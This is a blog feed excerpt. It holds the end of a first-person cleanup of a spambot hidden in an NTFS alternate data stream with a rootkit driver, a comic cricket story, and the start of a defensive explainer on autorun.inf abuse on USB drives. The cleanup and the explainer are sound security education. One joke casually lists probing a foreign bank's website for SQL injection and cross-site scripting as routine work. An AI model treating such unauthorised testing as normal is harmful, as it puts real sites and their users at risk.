The strings that I saw were definitely not part of a legitimate svchost.exe; comparing the strings in memory against those in the on-disk image is a quick way to spot code that has been injected into, or loaded by, a hosting process such as svchost.
I honestly had not expected an NTFS Alternate Data Stream SpamBot to affect my system.&lt;br /&gt;&lt;br /&gt;&lt;div  style="text-align: center;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SmgWuodd8_I/AAAAAAAAAMI/wdrh8X-Mazc/s1600-h/6.PNG"&gt;&lt;img style="cursor: pointer; width: 322px; height: 101px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SmgWuodd8_I/AAAAAAAAAMI/wdrh8X-Mazc/s400/6.PNG" alt="" id="Img5" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;The &lt;span style="font-weight: bold;"&gt;ext.exe &lt;/span&gt;that comes after the svchost is an &lt;span style="font-weight: bold;"&gt;NTFS ADS&lt;/span&gt; or Alternate Data Stream. To access an ADS you have to specify the “host” file followed by a colon and the filename of the ADS. By default all files on an NTFS partition have an ADS, the data in the file itself is stored as an ADS without any name as &lt;span style="font-weight: bold;"&gt;filename::$DATA&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;That was interesting enough to wet my appetite to go on. I took a quick morning break, freshened up myself and sat back at the desk to continue my investigation. So I now knew the exact file that was causing the issue. I wanted to extract the ADS and store it in the collection of malware that I have on my computer. I used &lt;span style="font-weight: bold;"&gt;Streams&lt;/span&gt; from Sysinternals to view the ADS size. 
Streams provides you an option to delete the ADS but I wanted to extract it.&lt;br /&gt;&lt;br /&gt;&lt;div  style="text-align: center;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SmgWu_5UsNI/AAAAAAAAAMQ/xW7Q8ziUHBE/s1600-h/7.PNG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 94px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SmgWu_5UsNI/AAAAAAAAAMQ/xW7Q8ziUHBE/s400/7.PNG" alt="" id="Img6" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;That is when I had to use a GUI tool that I had written long long ago, called &lt;span style="font-weight: bold;"&gt;NTStream&lt;/span&gt; for a software competition when I was still in college. I ran NTStream, just to be safer, on the whole Windows Directory. NTStream scanned 2318 directories and 26802 files in under a minute and displayed the search result in its ListView Interface.&lt;br /&gt;&lt;br /&gt;&lt;div  style="text-align: center;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SmgWvGae7-I/AAAAAAAAAMY/1RpVewA_EM4/s1600-h/8.PNG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 306px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SmgWvGae7-I/AAAAAAAAAMY/1RpVewA_EM4/s400/8.PNG" alt="" id="Img7" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;I extracted the stream for later research and then deleted it and the FCI and the ICF services entry from the Windows Registry under the &lt;span style="font-weight: bold;"&gt;HKLM\System\CurrentControlSet\Services\FCI&lt;/span&gt; and &lt;span style="font-weight: bold;"&gt;HKLM\System\CurrentControlSet\Services\ICF&lt;/span&gt; respectively. 
I then deleted &lt;span style="font-weight: bold;"&gt;rs32net&lt;/span&gt; from the System32 directory, just in case, and then proceeded to enable my Network Connection that I had disabled to prevent the ISP calling up or disconnecting me forever from the online world for using my system to spam.&lt;br /&gt;&lt;br /&gt;As soon as I enabled the Internet Connection, the flurry of Network Activity was reported again by TCPView. Damn! This was definitely the sign of an executable in memory or some driver or dll that was still doing what it was supposed to do, spam.&lt;br /&gt;&lt;br /&gt;I fired up Procmon to view disk activity just in case to see if svchost was acting funny elsewhere on the hard drive. Never before in my life was I greeted with this by Procmon.&lt;br /&gt;&lt;br /&gt;&lt;div  style="text-align: center;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SmgWvbnaVHI/AAAAAAAAAMg/RKJ1v_DXe4s/s1600-h/9.PNG"&gt;&lt;img style="cursor: pointer; width: 356px; height: 119px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SmgWvbnaVHI/AAAAAAAAAMg/RKJ1v_DXe4s/s400/9.PNG" alt="" id="Img8" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;I was sure I was an Administrator on my system. Very sure about it. I checked just in case wondering whether I was downgraded to a limited user by a hitherto unknown power. The command &lt;span style="font-weight: bold;"&gt;net user %username%&lt;/span&gt; at a command prompt told me I was very well an Administrator and a member of the Debuggers Group. I ran Procmon again and viewed its properties in Process Explorer to make sure I had the &lt;span style="font-weight: bold;"&gt;SeLoadDriverPrivelege&lt;/span&gt; enabled. 
I very well had.&lt;br /&gt;&lt;br /&gt;&lt;div  style="text-align: center;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SmgWvh8x6eI/AAAAAAAAAMo/9la58_L_LS0/s1600-h/10.PNG"&gt;&lt;img style="cursor: pointer; width: 346px; height: 400px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SmgWvh8x6eI/AAAAAAAAAMo/9la58_L_LS0/s400/10.PNG" alt="" id="Img9" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;This was weird: an Administrator holding SeLoadDriverPrivilege should be able to load Procmon's driver, so a failure at that point suggested that something below the Windows API was interfering with driver loading, which is exactly the kind of behaviour a kernel-mode rootkit exhibits. The only hope I now had was Sysinternals' RootkitRevealer, which compares the registry and file system as reported through the Windows API against a raw scan of the hive files and the NTFS volume, and lists every discrepancy; an object that is present on disk but invisible to the API is the classic signature of a rootkit. I quickly pulled it out of my toolkit and ran it scanning in default mode. I was hoping it would return something more concrete.&lt;br /&gt;&lt;br /&gt;&lt;div  style="text-align: center;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SmgXGK8mixI/AAAAAAAAAMw/i-M4UTxCUFU/s1600-h/11.PNG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 113px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SmgXGK8mixI/AAAAAAAAAMw/i-M4UTxCUFU/s400/11.PNG" alt="" id="Img10" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;The scan revealed several discrepancies, but what caught my attention was the lone result from the file system right at the bottom of the 3576 entries: a driver file that Windows itself would not show me. The only way I could think of to reach the file was to boot from an alternate medium and check, because a rootkit active in the running kernel can hide the file from every tool that runs on top of it. But luckily I had installed a copy of the Recovery Console on my system. I restarted the computer into the Recovery Console, navigated to the C:\Windows\System32\Drivers directory and issued a &lt;span style="font-weight: bold;"&gt;dir tj*&lt;/span&gt; command. I was delighted to see the file there. 
Although I had not exactly figured out the role of the TJTXSGTX.SYS driver in this whole case, I was nevertheless delighted to see that the file was at least visible under the Recovery Console. I promptly deleted the file and restarted the computer normally. (In hindsight, any service entry that loaded the driver, if one existed under HKLM\System\CurrentControlSet\Services, deserved the same treatment, and a machine that has been hiding a kernel driver from its own administrator is a strong candidate for a rebuild from known-good media rather than a clean-up.) I then enabled my Internet Connection and waited with bated breath for the sequence to start again. After 5 minutes of suspense, when nothing happened, I decided to close the case after running an &lt;span style="font-weight: bold;"&gt;sfc /scannow&lt;/span&gt; to verify that the protected system files had not been tampered with.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;PS:&lt;/span&gt; By the way, my friend installed a popular antivirus and managed to clean other infections later in the evening. He claimed it took him a little over 30 minutes, unlike me. I appreciate his humor.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-7835572080383944425?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/7835572080383944425/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/07/case-of-intelligent-spambot.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7835572080383944425'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7835572080383944425'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/07/case-of-intelligent-spambot.html' title='The Case of the Intelligent Spambot'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' 
src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_17JNeVdiZ7k/SmgWRAWeWaI/AAAAAAAAALg/znuXrx5RPCU/s72-c/1.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-6661516014570959452</id><published>2009-07-16T01:34:00.000-07:00</published><updated>2009-10-05T05:04:14.132-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='irony'/><category scheme='http://www.blogger.com/atom/ns#' term='Cricket'/><category scheme='http://www.blogger.com/atom/ns#' term='Pain'/><category scheme='http://www.blogger.com/atom/ns#' term='20Twenty'/><category scheme='http://www.blogger.com/atom/ns#' term='life'/><category scheme='http://www.blogger.com/atom/ns#' term='IPL'/><category scheme='http://www.blogger.com/atom/ns#' term='Humor'/><category scheme='http://www.blogger.com/atom/ns#' term='Auction'/><title type='text'>The Aftermath.</title><content type='html'>&lt;span style=";font-family:trebuchet ms;font-size:100%;"  &gt;This incident happened somewhere in February 2008.&lt;br /&gt;&lt;br /&gt;I was woken by the shrill ringing of my dad’s alarm clock. I jumped up in bed and rummaged around to silence the annoying ring still wondering why the alarm was ringing in my room. I finally managed to find it tucked under the bed covers in the most inaccessible corner of the bed. Silencing it I rubbed my eyes looking at the time that it displayed. 4:00!! Never in my 12 years of schooling, 2 years of high school and 4 years of Engineering did I ever wake up at 4:00.. This was absurd. I shook the damn clock, picked up my mobile phone and checked the time again. It showed 4:04 AM, but the 4 additional minutes towards another lazy morning didn’t warm my spirits. 
I chucked the clock on the table in some far reclusive corner under a pile of programming books and slumped back in the warmth of my bed, sinking in its soft clutches stretching my legs as far as they would go in the depth of my bed covers. I had just pulled the pillow over my head when the door knocked. I ignored the first 3 knocks but then they came harder. 6 knocks in line, loud and resonating, probably produced with hands the size of dustbin lids. Wondering if there could be a mountain troll standing out ready to nail me at this unearthly hour, I reluctantly pulled myself up, heaved my drowsy legs on to the floor and swayed towards the door muttering under my breath. The energy required to walk across my room to the door was devastatingly colossal. The knocks sounded again, louder this time. I prayed it wasn’t my youngest brother playing another of his out of the box tricks on me. If it was, I would drown him in the tub. I turned the knob and yanked the door a bit.&lt;br /&gt;&lt;br /&gt;My father pushed the door open and half walked, half ran in. Jubilant and with twinkling eyes, as though he had won an argument with my mom, he put on the lights and starting rambling something incoherent to my drowsy ears. “Are u even listening!!??”, he was almost towering over me. “Haan dad, what happened, its 4:00 in the morning…. (yawn..) for heaven’s sake can we like talk at 10:00 or something… (yaaaaawwwwwn...)”.&lt;br /&gt;&lt;br /&gt;“My son this is not the time to sleep, this is the time to exercise, to keep yourself fit, to work out, to play…” I looked at him, “What are you saying dad?? Exercise?? Play?? I come to Goa so that I can escape the monotonous and hectic life of Bangalore and sleep peacefully, and you wake me up at 4:00 in the morning, no prior warnings, nothing, and half expect me to exercise?? What’s got into you?” I wasn’t rude, but was satisfied that I had put my point across firmly. I thought that this argument would silence him. 
“Son, my dear son you do not understand. You are naive. Your company is manipulating you. You don’t have to worry about Internet and Web Security, there are loads of people out there who can take care of that. I understand it sounds all cool to be called a Hacker, but son you do not see the long term consequences that your job might offer you.” I looked at him mouth open, with an absurd expression. He had found 4:00 AM as a convenient time to express his opinion about my career?? I slumped on the chair nearest to me and looked at him. He took it as a cue to continue. “There are bigger things out there. What all do you expect to do with your salary, that does not even suffice your needs back there. Times are changing son, and it’s in the books that you have to flow with time.” I still couldn’t see where he was going. I didn’t protest this time, but looked at him awe struck allowing my pupils to dilate and stare beyond him. “So dad, what do you want me to do? Tell me quickly so that I can find some of my lost sleep.” I didn’t want to look at my bed. My skin crawled with nostalgic memories of the soft feel of my bed, pillow, the sheets and my pyjamas… “I have a gift for you” he suddenly announced. I wondered what it could be. Was silently hoping it would be Raymond Chen’s &lt;span style="font-style: italic;"&gt;The Old New Thin&lt;/span&gt;g or &lt;span style="font-style: italic;"&gt;Harry Potter and The Deathly Hallows &lt;/span&gt;in hardcover. “Go, freshen up first, we have a long morning ahead.” It was less of a request and more of an order. I reluctantly obeyed.&lt;br /&gt;&lt;br /&gt;The hands obscenely gestured 4:35 on my wrist watch by the time I was ready. I took a last loving longing look at my soft bed, the pillows, the sheets and my inside out pajamas, locked my room and walked down to the living room. Both my brothers had already donned tracks, tees and sports shoes and were smiling triumphantly. 
The whole house had gone mad, I presumed, I looked appealingly towards my brothers, who just smiled stupidly. I missed my mother. Wished I could teleport to Mumbai, to my cousins, and sleep there, in her lap. That Jumper guy was fabulous. I was shaken out of my psionic stupor when my dad called out to me and placed a long heavy object concealed inside a thick plastic covering, in my hands. I looked down at it. With my brothers gasping and ooohh-ing in the background, I pulled the object from the depths of the cover just like Hrithik Roshan pulling out his sword out of the scabbard in Jodha Akbar. There I was holding a gleaming willow &lt;span style="font-style: italic; font-weight: bold;"&gt;bat&lt;/span&gt;!! I ricocheted under the shock and irony of the whole situation. My dad wanted us to play cricket at this unearthly hour. What next?? I stood there, emotions of mutiny rising from every inch of my body. My youngest brother let out a war whoop similar to the one George of the Jungle lets out occasionally in well, George of the Jungle. “Dad, for all my forsaken years that I have lived, I haven’t played cricket. I haven’t even been on a pitch. For God’s sake I haven’t even lifted a bat before!!!” My father calmly replied, “Of course you have lifted a bat before. Don’t you remember when Santosh’s dog had chased you?? I could vaguely recollect that incident that had happened 3 years ago. But I had used the bat defensively, that to on to the dog for heaven’s sake. And I remember missing the animal by miles. “Dad I couldn’t hit a Labrador with this” I said lifting the bat “do you expect me to hit a ball?? That too when it’s thrown at me at 60 odd mph!!!” I swear I could hear my brothers making fun of me. My father was nevertheless adamant. And pushed us out. I had never seen my brothers happier then this. I walked in silence holding the bat over my shoulders like a mace. It was almost dawn now. 
The place where I live is beautified by the silence it envisages occasionally to be broken by the chirping of birds or kids playing Ring a Ring o’ Roses…&lt;br /&gt;&lt;br /&gt;I opened the gate to my house, with my brothers tearing off in short sprints across the lawn to the common ground that we shared with 24 other houses in the locality. I was surprised to see the ground crowded with people. Kids of all ages and sizes. I saw several familiar faces. There were even mothers feeding sandwiches (or something similar) to their wards while they wielded bats. India is gone crazy I thought. I stood there watching everybody, the tantrums that some were throwing on becoming out. I was even surprised to see Nikita standing beautiful as ever, a pretty girl I vied for when I was in college.&lt;br /&gt;&lt;br /&gt;Somebody tapped on to my shoulders from behind. I turned around to see another cricket enthusiast in complete field attire. He put forth his glove wrapped right hand. Out of instinct and base sanity I shook his hand and helloed him back. At this he removed his heavy, constricting looking helmet. I faltered where I stood. There stood Imran, a renowned bully and my brother’s old pal. Having strict parents were no consolation to him. I remember how the entire locality would stand in their balconies at precisely 9:45 on the Saturday that our results were declared when in school just to see his reddened report card fly out of his balcony and land on the road below. Then came the usual hollow “Aai ga, no dad I’m sorry… agli baar aise nahi hoga… sorry dad sorry… aaaaaaaaahhhh.” The tortures by his parents were constant reminders to us. He was bad, no, bad would be a mild word, disastrous would better define it, at studies. He was already 17 and was still to appear his 10th Standard Exams in March. 
My friends said he was caned every night before going to bed just because he didn’t study and played a lot… Those stories would send shivers down my spine and God knows where else. But today he appeared vibrant and fresh. I searched for words to console his condition and to put some sense into his big fat head. Before I could speak, he asked me “Bhai for how many days are you going to be here??” I was defensive on that. I thought what were his ulterior motives involved. I wasn’t related to him or his dealings in any sort of way. The truth would be harmless I assumed. “Another 2 days probably” I replied. “How come you are out playing today? I thought your parents forced you to study and stuff.” I tried to look as innocent as possible, but with my drowsy eyes and lopsided body it wasn’t easy. He smiled at the question and delightedly replied “I don’t know what got into my father yesterday. He went and bought me a full cricket kit and asked me to play as much as I want. Wants to make a Dhoni out of me. Told me I could grow my hair as long as I wanted.” I wanted to laugh at him, but considered my situation; I too was in the same boat. He donned back his helmet and gestured me to come along.&lt;br /&gt;&lt;br /&gt;My brother, it so happens, is pretty well known in the local fraternity. Kids kind of rally around him. I wasn’t surprised though with him being good friends with Imran. I walked to the end of the pitch and sat down on the grass boundary behind the wicket while my brother gave orders to 12 or so other kids. I had just started to visualize myself in my bed back at home when suddenly two pairs of arms lifted me off the ground and somebody pushed a helmet onto my head. Gloves were thrust into my hands, I looked around for help and noticed around ten boys, several of them my age standing looking at me. I imagined myself with a helmet and gloves on, must have looked funny because most of the boys snickered at me. 
Nikita too let out a gasp at seeing me on the ground probably realizing I wasn’t meant to be there. My brother came forth and pushed my new bat into my shivering hands and directed me towards the wicket. I faltered. God was this The End. Could it all be happening?? Give me a hundred application modules to write in Visual Basic, I’ll do it. Ask me what the full name of Albus Percival Wulfric Brian Dumbledore is, I’ll tell you. Order me to check some Russian Banking website for SQL Injection and Cross-Site Scripting, I’ll gladly do it, Ask me to parse Nessus XML files using C# and .NET and create Database Insert statements, I’ll really really do it… but don’t let me go on the pitch… please God… please…&lt;br /&gt;&lt;br /&gt;I walked with all my courage, I’ll be honest I didn’t have any, to the pitch. A sudden silence had fallen over the place. I turned to look at Nikita, she was standing with her hands folded looking upwards expecting Gabriel to intervene. I faked a smile at her, even though she wasn’t looking at me. Her beautiful eyes were closed, I assumed she was praying or she did not have the heart to see me hit by a projectile moving over 60 mph. I turned around to see who was going to bowl me over. I wished I hadn’t seen him. It was a boy over 6 feet tall, heavily built and almost bald. Those dudes from &lt;span style="font-style: italic;"&gt;Resident Evil&lt;/span&gt; looked milder. I gulped the last ounce of strength I had. Time seemed to slow down. Voices went all hoarse and electrified. A droplet of sweat from my forehead appeared to defy gravity and fall the length to the ground in what seemed like eternity. The bowler rushed up with all his speed, even in slow-mo he was faster then usual. It was then I realized I hadn’t worn my guard!! I panicked and dropped my bat and raising my right hand signaling the bowler to stop and with the left covering my possessions. Too late. 
The ball came at the speed of light and whhhhhhhhhhhaaaaaaaaaaammmmm…&lt;br /&gt;&lt;br /&gt;I woke up with a scream… I felt around my bed and body sweating profusely. My room mate woke up with my cry and put on the lights wondering whether I had seen Jigsaw or Lord Voldemort himself. I returned to my senses. One scary nightmare that was. Damn the IPL, damn the cricketers, damn the auction and damn 20Twenty. I’m happy doing what I do. My room mate wore a concerned expression. I looked at him and smiled and giving no explanation told him to sleep. Poor chap he hasn’t slept the whole of last week. His parents want him to come down to Goa for the annual State Cricket Selections threatening him with dire consequences if he refuses. I identified my nightmare with his reality. Hope he and his family survives his appraisal in one piece. Then I turned around and went back to warmth of my soft bed, the sheets, the pillow and my pajamas.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-6661516014570959452?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/6661516014570959452/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/07/aftermath.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/6661516014570959452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/6661516014570959452'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/07/aftermath.html' title='The Aftermath.'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-5262776499673439517</id><published>2009-07-09T05:38:00.000-07:00</published><updated>2009-07-14T02:01:32.497-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Removable'/><category scheme='http://www.blogger.com/atom/ns#' term='autorun'/><category scheme='http://www.blogger.com/atom/ns#' term='virus'/><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='USB'/><title type='text'>USB Drives and the Autorun.inf</title><content type='html'>&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;USB drives have made our lives so much easier. You can move data between computers and store large files with ease for long term usage. Virus writers didn’t want to lag behind and they saw this as the perfect channel for distribution of malicious files. Worms, viruses, trojans and other malicious files cause more damage if the infected system is able to proliferate copies of the malicious files and distribute them to other systems either with the help of users or through other programmed actions.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Most computer users who have used a removable drive have come in contact with a malicious file (virus, worm or trojan) residing on their drive. 
Normally an antivirus on the system should be able to detect and clean the infection, but often the drive remains infected. It then comes down to the user to be able to detect and delete an infected file on the drive manually.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Most malicious files that reside on the USB drive infect your computer when the user opens the removable drive via My Computer or when the default action is performed via the Windows AutoRun feature. Even merely double clicking on the drive can cause a system to get infected, because the double click invokes the drive's default action, and an autorun.inf file can redirect that action to an executable of the attacker's choosing.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;An autorun.inf file is a plaintext configuration file that resides at the root of a drive (local hard drives, USB drives, CD-ROMs, DVDs etc.) and contains information about the actions to take when a user performs the default action on the drive. The default action is the one that is shown in bold in the right click context menu of the drive in My Computer (for any Windows object for that matter). 
For example the default action on a folder or a drive would be to &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Open&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; the folder or drive. For a file it would be to open the file with the associated program. For the Local Area Connection Object in Network Connections it would be to show the &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Status&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; of the connection.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlXpOcT2ncI/AAAAAAAAAKw/q-Q-h0kTYIo/s1600-h/1.PNG"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;img src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlXpOcT2ncI/AAAAAAAAAKw/q-Q-h0kTYIo/s400/1.PNG" alt="" id="BLOGGER_PHOTO_ID_5356443766153977282" style="cursor: pointer; width: 295px; height: 400px;" border="0" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SlXpOj4oS1I/AAAAAAAAAK4/t3RFjnvYIts/s1600-h/2.PNG"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;img src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SlXpOj4oS1I/AAAAAAAAAK4/t3RFjnvYIts/s400/2.PNG" alt="" id="BLOGGER_PHOTO_ID_5356443768187276114" style="cursor: pointer; width: 306px; height: 220px;" border="0" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;img1&gt;&lt;/img1&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;img2&gt;&lt;/img2&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;An autorun.inf file normally contains the name of the file that has to be opened when the user performs the default action, which icon to use etc. You may have encountered legitimate autorun.inf files on CD-ROMs and DVDs. When you insert a CD-ROM containing software or game installation files (if AutoRun is enabled and if an autorun.inf file is present) the installation menu pops up allowing you to install the software. 
This executable is run automatically since Windows reads the autorun.inf file to find the name of the executable to be run, if any.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;A simple autorun.inf file would contain the following:&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'courier new';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;[autorun]&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'courier new';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Open=executable.exe&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'courier new';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Icon=autorun.ico&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Viruses go a step further in concealing their presence on the drive. They hide the autorun.inf file and the executable using the hidden and system attribute so that the file is not visible even after you ask Explorer to show hidden files. There are various ways to confirm the presence of an autorun.inf file in the root of 